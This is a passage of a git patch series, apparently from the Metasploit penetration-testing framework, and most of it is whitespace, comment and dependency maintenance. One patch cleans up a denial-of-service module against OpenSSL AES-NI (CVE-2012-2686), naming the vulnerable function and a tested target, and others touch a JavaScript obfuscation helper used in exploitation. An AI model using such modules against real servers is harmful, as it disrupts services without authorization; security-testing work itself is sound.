# #define IMAGE_SIZEOF_BASE_RELOCATION 8 - # IMAGE_SIZEOF_BASE_RELOCATION = 8 + + # Struct + # typedef struct _IMAGE_BASE_RELOCATION { + # DWORD VirtualAddress; + # DWORD SizeOfBlock; + # // WORD TypeOffset[1]; + # } IMAGE_BASE_RELOCATION; + # typedef IMAGE_BASE_RELOCATION UNALIGNED * PIMAGE_BASE_RELOCATION; IMAGE_BASE_RELOCATION = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'VirtualAddress', 0 ], [ 'uint32v', 'SizeOfBlock', 0 ] @@ -739,29 +725,29 @@ class PeBase end end - # - # typedef struct { - # DWORD Size; - # DWORD TimeDateStamp; - # WORD MajorVersion; - # WORD MinorVersion; - # DWORD GlobalFlagsClear; - # DWORD GlobalFlagsSet; - # DWORD CriticalSectionDefaultTimeout; - # DWORD DeCommitFreeBlockThreshold; - # DWORD DeCommitTotalFreeThreshold; - # DWORD LockPrefixTable; // VA - # DWORD MaximumAllocationSize; - # DWORD VirtualMemoryThreshold; - # DWORD ProcessHeapFlags; - # DWORD ProcessAffinityMask; - # WORD CSDVersion; - # WORD Reserved1; - # DWORD EditList; // VA - # DWORD SecurityCookie; // VA - # DWORD SEHandlerTable; // VA - # DWORD SEHandlerCount; - # } IMAGE_LOAD_CONFIG_DIRECTORY32, *PIMAGE_LOAD_CONFIG_DIRECTORY32; + # Struct + # typedef struct { + # DWORD Size; + # DWORD TimeDateStamp; + # WORD MajorVersion; + # WORD MinorVersion; + # DWORD GlobalFlagsClear; + # DWORD GlobalFlagsSet; + # DWORD CriticalSectionDefaultTimeout; + # DWORD DeCommitFreeBlockThreshold; + # DWORD DeCommitTotalFreeThreshold; + # DWORD LockPrefixTable; // VA + # DWORD MaximumAllocationSize; + # DWORD VirtualMemoryThreshold; + # DWORD ProcessHeapFlags; + # DWORD ProcessAffinityMask; + # WORD CSDVersion; + # WORD Reserved1; + # DWORD EditList; // VA + # DWORD SecurityCookie; // VA + # DWORD SEHandlerTable; // VA + # DWORD SEHandlerCount; + # } IMAGE_LOAD_CONFIG_DIRECTORY32, *PIMAGE_LOAD_CONFIG_DIRECTORY32; # IMAGE_LOAD_CONFIG_DIRECTORY32 = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'Size', 0 ], @@ -786,30 +772,29 @@ class PeBase [ 'uint32v', 'SEHandlerCount', 0 ] ) - # - # typedef struct { - # ULONG Size; - # ULONG TimeDateStamp; - # USHORT MajorVersion; - # USHORT MinorVersion; - # ULONG GlobalFlagsClear; - # ULONG GlobalFlagsSet; - # ULONG CriticalSectionDefaultTimeout; - # ULONGLONG DeCommitFreeBlockThreshold; - # ULONGLONG DeCommitTotalFreeThreshold; - # ULONGLONG LockPrefixTable; // VA - # ULONGLONG MaximumAllocationSize; - # ULONGLONG VirtualMemoryThreshold; - # ULONGLONG ProcessAffinityMask; - # ULONG ProcessHeapFlags; - # USHORT CSDVersion; - # USHORT Reserved1; - # ULONGLONG EditList; // VA - # ULONGLONG SecurityCookie; // VA - # ULONGLONG SEHandlerTable; // VA - # ULONGLONG SEHandlerCount; - # } IMAGE_LOAD_CONFIG_DIRECTORY64, *PIMAGE_LOAD_CONFIG_DIRECTORY64; - # + # Struct + # typedef struct { + # ULONG Size; + # ULONG TimeDateStamp; + # USHORT MajorVersion; + # USHORT MinorVersion; + # ULONG GlobalFlagsClear; + # ULONG GlobalFlagsSet; + # ULONG CriticalSectionDefaultTimeout; + # ULONGLONG DeCommitFreeBlockThreshold; + # ULONGLONG DeCommitTotalFreeThreshold; + # ULONGLONG LockPrefixTable; // VA + # ULONGLONG MaximumAllocationSize; + # ULONGLONG VirtualMemoryThreshold; + # ULONGLONG ProcessAffinityMask; + # ULONG ProcessHeapFlags; + # USHORT CSDVersion; + # USHORT Reserved1; + # ULONGLONG EditList; // VA + # ULONGLONG SecurityCookie; // VA + # ULONGLONG SEHandlerTable; // VA + # ULONGLONG SEHandlerCount; + # } IMAGE_LOAD_CONFIG_DIRECTORY64, *PIMAGE_LOAD_CONFIG_DIRECTORY64; IMAGE_LOAD_CONFIG_DIRECTORY64 = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'Size', 0 ], [ 'uint32v', 'TimeDateStamp', 0 ], @@ -838,12 +823,14 @@ class PeBase end + #-- # doesn't seem to be used -- not compatible with 64-bit #def self._parse_config_header(rawdata) # header = IMAGE_LOAD_CONFIG_DIRECTORY32.make_struct # header.from_s(rawdata) # ConfigHeader.new(header) #end + #++ def _parse_config_header @@ -879,30 +866,29 @@ class PeBase # TLS Directory # - # - # typedef struct { - # DWORD Size; - # DWORD TimeDateStamp; - # WORD MajorVersion; - # WORD MinorVersion; - # DWORD GlobalFlagsClear; - # DWORD GlobalFlagsSet; - # DWORD CriticalSectionDefaultTimeout; - # DWORD DeCommitFreeBlockThreshold; - # DWORD DeCommitTotalFreeThreshold; - # DWORD LockPrefixTable; // VA - # DWORD MaximumAllocationSize; - # DWORD VirtualMemoryThreshold; - # DWORD ProcessHeapFlags; - # DWORD ProcessAffinityMask; - # WORD CSDVersion; - # WORD Reserved1; - # DWORD EditList; // VA - # DWORD SecurityCookie; // VA - # DWORD SEHandlerTable; // VA - # DWORD SEHandlerCount; - # } IMAGE_LOAD_CONFIG_DIRECTORY32, *PIMAGE_LOAD_CONFIG_DIRECTORY32; - # + # Struct + # typedef struct { + # DWORD Size; + # DWORD TimeDateStamp; + # WORD MajorVersion; + # WORD MinorVersion; + # DWORD GlobalFlagsClear; + # DWORD GlobalFlagsSet; + # DWORD CriticalSectionDefaultTimeout; + # DWORD DeCommitFreeBlockThreshold; + # DWORD DeCommitTotalFreeThreshold; + # DWORD LockPrefixTable; // VA + # DWORD MaximumAllocationSize; + # DWORD VirtualMemoryThreshold; + # DWORD ProcessHeapFlags; + # DWORD ProcessAffinityMask; + # WORD CSDVersion; + # WORD Reserved1; + # DWORD EditList; // VA + # DWORD SecurityCookie; // VA + # DWORD SEHandlerTable; // VA + # DWORD SEHandlerCount; + # } IMAGE_LOAD_CONFIG_DIRECTORY32, *PIMAGE_LOAD_CONFIG_DIRECTORY32; IMAGE_LOAD_TLS_DIRECTORY32 = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'Size', 0 ], [ 'uint32v', 'TimeDateStamp', 0 ], @@ -926,30 +912,29 @@ class PeBase [ 'uint32v', 'SEHandlerCount', 0 ] ) - # - # typedef struct { - # ULONG Size; - # ULONG TimeDateStamp; - # USHORT MajorVersion; - # USHORT MinorVersion; - # ULONG GlobalFlagsClear; - # ULONG GlobalFlagsSet; - # ULONG CriticalSectionDefaultTimeout; - # ULONGLONG DeCommitFreeBlockThreshold; - # ULONGLONG DeCommitTotalFreeThreshold; - # ULONGLONG LockPrefixTable; // VA - # ULONGLONG MaximumAllocationSize; - # ULONGLONG VirtualMemoryThreshold; - # ULONGLONG ProcessAffinityMask; - # ULONG ProcessHeapFlags; - # USHORT CSDVersion; - # USHORT Reserved1; - # ULONGLONG EditList; // VA - # ULONGLONG SecurityCookie; // VA - # ULONGLONG SEHandlerTable; // VA - # ULONGLONG SEHandlerCount; - # } IMAGE_LOAD_CONFIG_DIRECTORY64, *PIMAGE_LOAD_CONFIG_DIRECTORY64; - # + # Struct + # typedef struct { + # ULONG Size; + # ULONG TimeDateStamp; + # USHORT MajorVersion; + # USHORT MinorVersion; + # ULONG GlobalFlagsClear; + # ULONG GlobalFlagsSet; + # ULONG CriticalSectionDefaultTimeout; + # ULONGLONG DeCommitFreeBlockThreshold; + # ULONGLONG DeCommitTotalFreeThreshold; + # ULONGLONG LockPrefixTable; // VA + # ULONGLONG MaximumAllocationSize; + # ULONGLONG VirtualMemoryThreshold; + # ULONGLONG ProcessAffinityMask; + # ULONG ProcessHeapFlags; + # USHORT CSDVersion; + # USHORT Reserved1; + # ULONGLONG EditList; // VA + # ULONGLONG SecurityCookie; // VA + # ULONGLONG SEHandlerTable; // VA + # ULONGLONG SEHandlerCount; + # } IMAGE_LOAD_CONFIG_DIRECTORY64, *PIMAGE_LOAD_CONFIG_DIRECTORY64; IMAGE_LOAD_TLS_DIRECTORY64 = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'Size', 0 ], [ 'uint32v', 'TimeDateStamp', 0 ], @@ -1014,14 +999,13 @@ class PeBase # ## - # - # typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY { - # DWORD BeginAddress; - # DWORD EndAddress; - # DWORD UnwindInfoAddress; - # } _IMAGE_RUNTIME_FUNCTION_ENTRY, *_PIMAGE_RUNTIME_FUNCTION_ENTRY; - # IMAGE_RUNTIME_FUNCTION_ENTRY_SZ = 12 + # Struct + # typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY { + # DWORD BeginAddress; + # DWORD EndAddress; + # DWORD UnwindInfoAddress; + # } _IMAGE_RUNTIME_FUNCTION_ENTRY, *_PIMAGE_RUNTIME_FUNCTION_ENTRY; IMAGE_RUNTIME_FUNCTION_ENTRY = Rex::Struct2::CStructTemplate.new( [ 'uint32v', 'BeginAddress', 0 ], [ 'uint32v', 'EndAddress', 0 ], @@ -1069,7 +1053,7 @@ class PeBase class UnwindInfo def initialize(pe, unwind_rva) data = pe.read_rva(unwind_rva, UNWIND_INFO_HEADER_SZ) - + unwind = UNWIND_INFO_HEADER.make_struct unwind.from_s(data) @@ -1115,26 +1099,26 @@ class PeBase def _load_exception_directory @exception = [] - + exception_entry = _optional_header['DataDirectory'][IMAGE_DIRECTORY_ENTRY_EXCEPTION] rva = exception_entry.v['VirtualAddress'] size = exception_entry.v['Size'] - + return if (rva == 0) - + data = _isource.read(rva_to_file_offset(rva), size) - + case hdr.file.Machine when IMAGE_FILE_MACHINE_AMD64 count = data.length / IMAGE_RUNTIME_FUNCTION_ENTRY_SZ - + count.times { |current| @exception << RuntimeFunctionEntry.new(self, data.slice!(0, IMAGE_RUNTIME_FUNCTION_ENTRY_SZ)) } else end - + return @exception end @@ -1651,7 +1635,7 @@ class PeBase rname.to_s end - + def update_checksum off = _dos_header.e_lfanew + IMAGE_FILE_HEADER_SIZE + 0x40 _isource.rawdata[off, 4] = [0].pack('V') From a57f04adb418ca112674d02d6df2c03ea2567a6c Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 5 Mar 2013 14:34:27 -0600 Subject: [PATCH 81/87] Exclude tests from documentation --- Rakefile | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/Rakefile b/Rakefile index a365eedfb9..d32e9352cb 100644 --- a/Rakefile +++ b/Rakefile @@ -16,11 +16,16 @@ namespace :yard do '-', 'COPYING', 'HACKING', - 'THIRD-PARTY.md' + 'LICENSE', + 'CONTRIBUTING.md', ] yard_options = [ # include documentation for protected methods for developers extending the code. - '--protected' + '--protected', + # Don't bother with files meant to be examples + '--exclude', 'samples/', + '--exclude', '\.ut\.rb/', + '--exclude', '\.ts\.rb/', ] YARD::Rake::YardocTask.new(:doc) do |t| From a928e5f963199e394c8402a17674035bb616cd4c Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 5 Mar 2013 14:34:56 -0600 Subject: [PATCH 82/87] Whitespace --- lib/msf/core/db.rb | 40 ++++++++++++++++++++-------------------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index 9b5c8d8212..bd6d0e4d81 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -699,7 +699,7 @@ class DBManager if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] mod_fullname = sess_data[:datastore]['ParentModule'] mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name - else + else mod_name = mod.name mod_fullname = mod.fullname end @@ -719,7 +719,7 @@ class DBManager vuln_info[:service] = service if service vuln = framework.db.report_vuln(vuln_info) - + if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule'] via_exploit = sess_data[:datastore]['ParentModule'] else @@ -738,7 +738,7 @@ class DBManager } framework.db.report_exploit_success(attempt_info) - + end s @@ -871,7 +871,7 @@ class DBManager ref.to_s end }) - + # Try find a matching vulnerability vuln = find_vuln_by_refs(ref_objs, host, svc) end @@ -890,7 +890,7 @@ class DBManager attempt_info[:loot_id] = opts[:loot_id] if opts[:loot_id] vuln.vuln_attempts.create(attempt_info) - + # Correct the vuln's associated service if necessary if svc and vuln.service_id.nil? vuln.service = svc @@ -909,12 +909,12 @@ class DBManager attempt_info[:vuln_id] = vuln.id if vuln attempt_info[:session_id] = opts[:session_id] if opts[:session_id] attempt_info[:loot_id] = opts[:loot_id] if opts[:loot_id] - + if svc attempt_info[:port] = svc.port attempt_info[:proto] = svc.proto end - + if port and svc.nil? attempt_info[:port] = port attempt_info[:proto] = prot || "tcp" @@ -937,7 +937,7 @@ class DBManager timestamp = opts.delete(:timestamp) freason = opts.delete(:fail_reason) - fdetail = opts.delete(:fail_detail) + fdetail = opts.delete(:fail_detail) username = opts.delete(:username) mname = opts.delete(:module) @@ -968,7 +968,7 @@ class DBManager ref.to_s end }) - + # Try find a matching vulnerability vuln = find_vuln_by_refs(ref_objs, host, svc) end @@ -1003,7 +1003,7 @@ class DBManager attempt_info[:port] = svc.port attempt_info[:proto] = svc.proto end - + if port and svc.nil? attempt_info[:port] = port attempt_info[:proto] = prot || "tcp" @@ -1018,7 +1018,7 @@ class DBManager ::ActiveRecord::Base.connection_pool.with_connection { return if not vuln info = {} - + # Opts can be keyed by strings or symbols ::Mdm::VulnAttempt.column_names.each do |kn| k = kn.to_sym @@ -1037,7 +1037,7 @@ class DBManager ::ActiveRecord::Base.connection_pool.with_connection { return if not host info = {} - + # Opts can be keyed by strings or symbols ::Mdm::VulnAttempt.column_names.each do |kn| k = kn.to_sym @@ -1623,7 +1623,7 @@ class DBManager # If a match is found on a vulnerability with no associated service, # update that vulnerability with our service information. This helps # prevent dupes of the same vuln found by both local patch and - # service detection. + # service detection. if rids and rids.length > 0 vuln = find_vuln_by_refs(rids, host, service) vuln.service = service if vuln @@ -1651,7 +1651,7 @@ class DBManager else vuln = host.vulns.find_by_name(name) end - + unless vuln vinf = { @@ -1660,7 +1660,7 @@ class DBManager :info => info } - vinf[:service_id] = service.id if service + vinf[:service_id] = service.id if service vuln = Mdm::Vuln.create(vinf) end end @@ -1681,7 +1681,7 @@ class DBManager # Handle vuln_details parameters report_vuln_details(vuln, details) if details - + vuln } end @@ -4196,9 +4196,9 @@ class DBManager # Takes an array of vuln hashes, as returned by the NeXpose rawxml stream # parser, like: # [ - # {"id"=>"winreg-notes-protocol-handler", severity="8", "refs"=>[{"source"=>"BID", "value"=>"10600"}, ...]} - # {"id"=>"windows-zotob-c", severity="8", "refs"=>[{"source"=>"BID", "value"=>"14513"}, ...]} - # ] + # {"id"=>"winreg-notes-protocol-handler", severity="8", "refs"=>[{"source"=>"BID", "value"=>"10600"}, ...]} + # {"id"=>"windows-zotob-c", severity="8", "refs"=>[{"source"=>"BID", "value"=>"14513"}, ...]} + # ] # and transforms it into a struct, containing :id, :refs, :title, and :severity # # Other attributes can be added later, as needed. @@ -5095,7 +5095,7 @@ class DBManager # # This method normalizes an incoming service name to one of the # the standard ones recognized by metasploit - # + # def service_name_map(proto) return proto unless proto.kind_of? String case proto.downcase From 3acccd71f7ff0beb07af0140044066a2c80dd3dd Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 5 Mar 2013 14:35:27 -0600 Subject: [PATCH 83/87] Whitespace and doc fix --- lib/rex/exploitation/obfuscatejs.rb | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/lib/rex/exploitation/obfuscatejs.rb b/lib/rex/exploitation/obfuscatejs.rb index 94e17c06dc..70db94e338 100644 --- a/lib/rex/exploitation/obfuscatejs.rb +++ b/lib/rex/exploitation/obfuscatejs.rb @@ -18,12 +18,12 @@ class ObfuscateJS # # The 'Symbols' argument should have the following format: # - # { - # 'Variables' => [ 'var1', ... ], - # 'Methods' => [ 'method1', ... ], - # 'Namespaces' => [ 'n', ... ], - # 'Classes' => [ { 'Namespace' => 'n', 'Class' => 'y'}, ... ] - # } + # { + # 'Variables' => [ 'var1', ... ], + # 'Methods' => [ 'method1', ... ], + # 'Namespaces' => [ 'n', ... ], + # 'Classes' => [ { 'Namespace' => 'n', 'Class' => 'y'}, ... ] + # } # # Make sure you order your methods, classes, and namespaces by most # specific to least specific to prevent partial substitution. For @@ -138,14 +138,14 @@ class ObfuscateJS # while (buf.length < len) # buf << set[rand(set.length)].chr # end - # + # # buf #} end # Remove our comments remove_comments - + # Globally replace symbols replace_symbols(@opts['Symbols']) if @opts['Symbols'] @@ -191,9 +191,9 @@ protected next if symbols[symtype].nil? symbols[symtype].each { |sym| dyn = Rex::Text.rand_text_alpha(rand(32)+1) until dyn and not taken.key?(dyn) - + taken[dyn] = true - + if symtype == 'Classes' full_sym = sym['Namespace'] + "." + sym['Class'] @dynsym[full_sym] = dyn From 709ec8a519ad81c1469aea1205402a7c816b26b6 Mon Sep 17 00:00:00 2001 From: Brandon Turner Date: Tue, 5 Mar 2013 14:41:09 -0600 Subject: [PATCH 84/87] Use start.sh to start Pro via msfupdate command start.sh (installed with community/pro on apt installs) automatically starts dependency services (such as postgresql). --- msfupdate | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/msfupdate b/msfupdate index 029b80b566..d32010e5fb 100755 --- a/msfupdate +++ b/msfupdate @@ -224,7 +224,10 @@ if is_apt else $stdout.puts "[*] Updating to version #{pro_version || framework_version}" system("apt-get", "install", "--assume-yes", *packages) - system("/etc/init.d/metasploit start") if packages.include?('metasploit') + if packages.include?('metasploit') + start_cmd = File.expand_path(File.join(@msfbase_dir, '..', '..', '..', 'scripts', 'start.sh')) + system(start_cmd) if ::File.executable_real? start_cmd + end end end From 781132b1cfe6ee08d13549a7f80bcdb03d5ea1c1 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 5 Mar 2013 22:41:16 +0100 Subject: [PATCH 85/87] cleanup for openssl_aesni --- modules/auxiliary/dos/ssl/openssl_aesni.rb | 21 ++++++++++++--------- 1 file changed, 12 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/dos/ssl/openssl_aesni.rb b/modules/auxiliary/dos/ssl/openssl_aesni.rb index 94ba11e470..f118a88abb 100644 --- a/modules/auxiliary/dos/ssl/openssl_aesni.rb +++ b/modules/auxiliary/dos/ssl/openssl_aesni.rb @@ -9,15 +9,18 @@ class Metasploit4 < Msf::Auxiliary super(update_info(info, 'Name' => 'OpenSSL TLS 1.1 and 1.2 AES-NI DoS', 'Description' => %q{ - The AES-NI implementation of OpenSSL 1.0.1c does not - properly compute the length of an encrypte message when used - with a TLS version 1.1 or above. This leads to an integer - underflow which can cause a DoS. + The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the + length of an encrypted message when used with a TLS version 1.1 or above. This + leads to an integer underflow which can cause a DoS. The vulnerable function + aesni_cbc_hmac_sha1_cipher is only included in the 64 bits versions of OpenSSL. + This module has been tested successfully on Ubuntu 12.04 (64 bits) with the default + OpenSSL 1.0.1c package. }, - 'Author' => [ - 'Wolfgang Ettlinger ' - ], - 'License' => BSD_LICENSE, + 'Author' => + [ + 'Wolfgang Ettlinger ' + ], + 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-2686'], @@ -138,7 +141,7 @@ class Metasploit4 < Msf::Auxiliary connect sock.put(p1) - resp = sock.recv(4096) + resp = sock.get_once cs = get_cipher_suite(resp) From 36e20807b04c0a701a0d984fa40e97541a9250a5 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Wed, 6 Mar 2013 09:53:26 -0600 Subject: [PATCH 86/87] Update Gemfile to metaploit_data_models 0.6.0 [#44034071] --- Gemfile | 2 +- Gemfile.lock | 8 ++++---- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/Gemfile b/Gemfile index 9513b0a497..251808c2a5 100755 --- a/Gemfile +++ b/Gemfile @@ -7,7 +7,7 @@ gem 'activerecord' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.5.1' +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.6.0' # Needed by msfgui and other rpc components gem 'msgpack' # Needed by anemone crawler diff --git a/Gemfile.lock b/Gemfile.lock index 983117cbb4..c16a1cca2f 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,9 +1,9 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: 1e3e0c2effb8e1bb6cec9683b830e4244babf706 - tag: 0.5.1 + revision: 0285d6e199f125b33214100dcb0f4eeb12ee765f + tag: 0.6.0 specs: - metasploit_data_models (0.5.1) + metasploit_data_models (0.6.0) activerecord (>= 3.2.10) activesupport pg @@ -55,7 +55,7 @@ GEM simplecov-html (~> 0.5.3) simplecov-html (0.5.3) slop (3.4.3) - tzinfo (0.3.35) + tzinfo (0.3.36) yard (0.8.3) PLATFORMS From fac941aae479c2795fd7dfec949d8e51765d4774 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Wed, 6 Mar 2013 09:59:09 -0600 Subject: [PATCH 87/87] Update gemcache with metasploit_data_models 0.6.0 [#44034071] --- .../metasploit_data_models-0.5.1/Rakefile | 20 -- .../base64_serializer.rb | 35 ---- .../lib/metasploit_data_models/engine.rb | 7 - .../spec/lib/base64_serializer_spec.rb | 22 --- .../.gitignore | 0 .../.rspec | 0 .../.simplecov | 0 .../.yardopts | 0 .../Gemfile | 3 + .../LICENSE | 0 .../README.md | 0 .../metasploit_data_models-0.6.0/Rakefile | 34 ++++ .../app/models/mdm/api_key.rb | 0 .../app/models/mdm/client.rb | 0 .../app/models/mdm/cred.rb | 0 .../app/models/mdm/event.rb | 0 .../app/models/mdm/exploit_attempt.rb | 0 .../app/models/mdm/exploited_host.rb | 0 .../app/models/mdm/host.rb | 0 .../app/models/mdm/host_detail.rb | 0 .../app/models/mdm/host_tag.rb | 0 .../app/models/mdm/imported_cred.rb | 0 .../app/models/mdm/listener.rb | 0 .../app/models/mdm/loot.rb | 0 .../app/models/mdm/macro.rb | 0 .../app/models/mdm/mod_ref.rb | 0 .../app/models/mdm/module_action.rb | 0 .../app/models/mdm/module_arch.rb | 0 .../app/models/mdm/module_author.rb | 0 .../app/models/mdm/module_detail.rb | 0 .../app/models/mdm/module_mixin.rb | 0 .../app/models/mdm/module_platform.rb | 0 .../app/models/mdm/module_ref.rb | 0 .../app/models/mdm/module_target.rb | 0 .../app/models/mdm/nexpose_console.rb | 0 .../app/models/mdm/note.rb | 0 .../app/models/mdm/profile.rb | 0 .../app/models/mdm/ref.rb | 0 .../app/models/mdm/report.rb | 0 .../app/models/mdm/report_template.rb | 0 .../app/models/mdm/route.rb | 0 .../app/models/mdm/service.rb | 0 .../app/models/mdm/session.rb | 0 .../app/models/mdm/session_event.rb | 0 .../app/models/mdm/tag.rb | 0 .../app/models/mdm/task.rb | 0 .../app/models/mdm/user.rb | 7 - .../app/models/mdm/vuln.rb | 0 .../app/models/mdm/vuln_attempt.rb | 0 .../app/models/mdm/vuln_detail.rb | 0 .../app/models/mdm/vuln_ref.rb | 0 .../app/models/mdm/web_form.rb | 0 .../app/models/mdm/web_page.rb | 0 .../app/models/mdm/web_site.rb | 0 .../app/models/mdm/web_vuln.rb | 55 +++++- .../app/models/mdm/wmap_request.rb | 0 .../app/models/mdm/wmap_target.rb | 0 .../app/models/mdm/workspace.rb | 0 .../bin/mdm_console | 0 .../console_db.yml | 0 .../db/migrate/000_create_tables.rb | 0 .../db/migrate/001_add_wmap_tables.rb | 0 .../db/migrate/002_add_workspaces.rb | 0 .../db/migrate/003_move_notes.rb | 0 .../db/migrate/004_add_events_table.rb | 0 .../db/migrate/005_expand_info.rb | 0 .../db/migrate/006_add_timestamps.rb | 0 .../db/migrate/007_add_loots.rb | 0 .../db/migrate/008_create_users.rb | 0 .../db/migrate/009_add_loots_ctype.rb | 0 .../db/migrate/010_add_alert_fields.rb | 0 .../db/migrate/011_add_reports.rb | 0 .../db/migrate/012_add_tasks.rb | 0 .../db/migrate/013_add_tasks_result.rb | 0 .../db/migrate/014_add_loots_fields.rb | 0 .../db/migrate/015_rename_user.rb | 0 .../db/migrate/016_add_host_purpose.rb | 0 .../db/migrate/017_expand_info2.rb | 0 .../db/migrate/018_add_workspace_user_info.rb | 0 .../db/migrate/019_add_workspace_desc.rb | 0 .../db/migrate/020_add_user_preferences.rb | 0 .../migrate/021_standardize_info_and_data.rb | 0 .../db/migrate/022_enlarge_event_info.rb | 0 .../migrate/023_add_report_downloaded_at.rb | 0 .../024_convert_service_info_to_text.rb | 0 .../db/migrate/025_add_user_admin.rb | 0 .../db/migrate/026_add_creds_table.rb | 0 .../20100819123300_migrate_cred_data.rb | 0 .../20100824151500_add_exploited_table.rb | 0 .../20100908001428_add_owner_to_workspaces.rb | 0 .../20100911122000_add_report_templates.rb | 0 .../20100916151530_require_admin_flag.rb | 0 ...00916175000_add_campaigns_and_templates.rb | 0 .../20100920012100_add_generate_exe_column.rb | 0 .../20100926214000_add_template_prefs.rb | 0 .../migrate/20101001000000_add_web_tables.rb | 0 .../db/migrate/20101002000000_add_query.rb | 0 .../migrate/20101007000000_add_vuln_info.rb | 0 ...20101008111800_add_clients_to_campaigns.rb | 0 ...20101009023300_add_campaign_attachments.rb | 0 .../20101104135100_add_imported_creds.rb | 0 .../migrate/20101203000000_fix_web_tables.rb | 0 .../20101203000001_expand_host_comment.rb | 0 ...2033_add_limit_to_network_to_workspaces.rb | 0 ...20110112154300_add_module_uuid_to_tasks.rb | 0 .../migrate/20110204112800_add_host_tags.rb | 0 .../20110317144932_add_session_table.rb | 0 ...414180600_add_local_id_to_session_table.rb | 0 .../20110415175705_add_routes_table.rb | 0 .../migrate/20110422000000_convert_binary.rb | 0 ...0110425095900_add_last_seen_to_sessions.rb | 0 ...0110513143900_track_successful_exploits.rb | 0 ...517160800_rename_and_prune_nessus_vulns.rb | 0 ...0527000000_add_task_id_to_reports_table.rb | 0 .../20110527000001_add_api_keys_table.rb | 0 .../20110606000001_add_macros_table.rb | 0 ...10622000000_add_settings_to_tasks_table.rb | 0 .../20110624000001_add_listeners_table.rb | 0 ...0625000001_add_macro_to_listeners_table.rb | 0 ...110630000001_add_nexpose_consoles_table.rb | 0 ...0002_add_name_to_nexpose_consoles_table.rb | 0 .../20110717000001_add_profiles_table.rb | 0 ...20110727163801_expand_cred_ptype_column.rb | 0 .../20110730000001_add_initial_indexes.rb | 0 .../migrate/20110812000001_prune_indexes.rb | 0 .../db/migrate/20110922000000_expand_notes.rb | 0 .../20110928101300_add_mod_ref_table.rb | 0 ...10000_add_display_name_to_reports_table.rb | 0 .../db/migrate/20111203000000_inet_columns.rb | 0 .../20111204000000_more_inet_columns.rb | 0 .../20111210000000_add_scope_to_hosts.rb | 0 ...0120126110000_add_virtual_host_to_hosts.rb | 0 ...20120411173220_rename_workspace_members.rb | 0 ...20601152442_add_counter_caches_to_hosts.rb | 0 .../20120625000000_add_vuln_details.rb | 0 .../20120625000001_add_host_details.rb | 0 .../migrate/20120625000002_expand_details.rb | 0 .../migrate/20120625000003_expand_details2.rb | 0 .../20120625000004_add_vuln_attempts.rb | 0 ...000005_add_vuln_and_host_counter_caches.rb | 0 .../20120625000006_add_module_details.rb | 0 .../20120625000007_add_exploit_attempts.rb | 0 .../20120625000008_add_fail_message.rb | 0 ...2805_add_owner_and_payload_to_web_vulns.rb | 0 ...ired_columns_to_null_false_in_web_vulns.rb | 0 .../lib/mdm.rb | 0 .../host/operating_system_normalization.rb | 0 .../lib/metasploit_data_models.rb | 0 .../base64_serializer.rb | 103 +++++++++++ .../lib/metasploit_data_models/engine.rb | 14 ++ .../serialized_prefs.rb | 0 .../validators/ip_format_validator.rb | 0 .../password_is_strong_validator.rb | 0 .../lib/metasploit_data_models/version.rb | 2 +- .../lib/tasks/yard.rake | 0 .../metasploit_data_models.gemspec | 0 .../script/rails | 0 .../spec/app/models/mdm/web_vuln_spec.rb | 41 ++++- .../spec/dummy/Rakefile | 0 .../app/assets/javascripts/application.js | 0 .../app/assets/stylesheets/application.css | 0 .../app/controllers/application_controller.rb | 0 .../dummy/app/helpers/application_helper.rb | 0 .../spec/dummy/app/mailers/.gitkeep | 0 .../spec/dummy/app/models/.gitkeep | 0 .../app/views/layouts/application.html.erb | 0 .../spec/dummy/config.ru | 0 .../spec/dummy/config/application.rb | 0 .../spec/dummy/config/boot.rb | 0 .../spec/dummy/config/database.yml.example | 0 .../spec/dummy/config/environment.rb | 0 .../dummy/config/environments/development.rb | 0 .../dummy/config/environments/production.rb | 0 .../spec/dummy/config/environments/test.rb | 0 .../initializers/backtrace_silencers.rb | 0 .../dummy/config/initializers/inflections.rb | 0 .../dummy/config/initializers/mime_types.rb | 0 .../dummy/config/initializers/secret_token.rb | 0 .../config/initializers/session_store.rb | 0 .../config/initializers/wrap_parameters.rb | 0 .../spec/dummy/config/routes.rb | 0 .../spec/dummy/db/schema.rb | 0 .../spec/dummy/lib/assets/.gitkeep | 0 .../spec/dummy/log/.gitkeep | 0 .../spec/dummy/public/404.html | 0 .../spec/dummy/public/422.html | 0 .../spec/dummy/public/500.html | 0 .../spec/dummy/public/favicon.ico | 0 .../spec/dummy/script/rails | 0 .../spec/factories/mdm/addresses.rb | 7 + .../spec/factories/mdm/hosts.rb | 18 ++ .../spec/factories/mdm/services.rb | 35 ++++ .../spec/factories/mdm/users.rb | 22 +++ .../spec/factories/mdm/web_sites.rb | 8 + .../spec/factories/mdm/web_vulns.rb 